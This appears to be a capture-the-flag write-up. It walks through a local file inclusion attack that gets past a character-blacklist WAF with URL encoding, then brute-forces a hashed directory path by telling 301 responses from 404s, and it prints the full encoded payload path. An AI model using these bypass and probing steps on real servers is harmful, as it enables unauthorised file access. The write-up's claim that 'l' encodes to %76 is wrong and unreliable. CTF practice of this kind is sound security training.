Can you find a treasure?
Task: In this challenge, we had to find the flag using LFI.
Triage:
Findings from source code review:
- The server black lists character f,l,a,g
- The flag is strored in a nested directory structure created using characters of md5 hash and ends with …/f/l/a/g/t/x/t. Where t is the file containing the flag.
Approach:
I first attempt to bypass the character blacklisting. After successfully bypassing the WAF, I try to find a signal that the directory exists. Using this signal I brute-force the the path to get the flag.
Step #1: Bypass WAF
- To bypass WAF, I try encoding to try and load /alpaca (a file existing on the server and had the blacklisted characters a and l)
- I try URL encoding (a → %61 and l → %76)
- <url>/%61%76p%61c%61 return the file alpaca and bypasses the WAF.
Step #2: Identifying the signal for an existing directory
- Upon accessing a non-existing directory:
- status_code = 404 (not found)
- Upon accessing an existing directory:
- Status Code = 301 (redirect)
Step #3: Brute force the path to get the file:
- I used burp suite to brute force the directory.
- Since the hash only has characters from 0 to f, I added this characters into the wordlist section.
- Identify valid characters with status code = 301.
- Following is the bruteforced path discovered:
/4/b/%61/%66/b/1/9/%61/7/b/6/6/c/b/4/1/5/e/b/0/7/0/c/e/1/%61/1/b/2/e/8/%66/%66/%6C/%61/%67/./t/x/t - In the above discovered path we have characters f,l,a,g url encoded.
Alpaca{alpaca***************tan}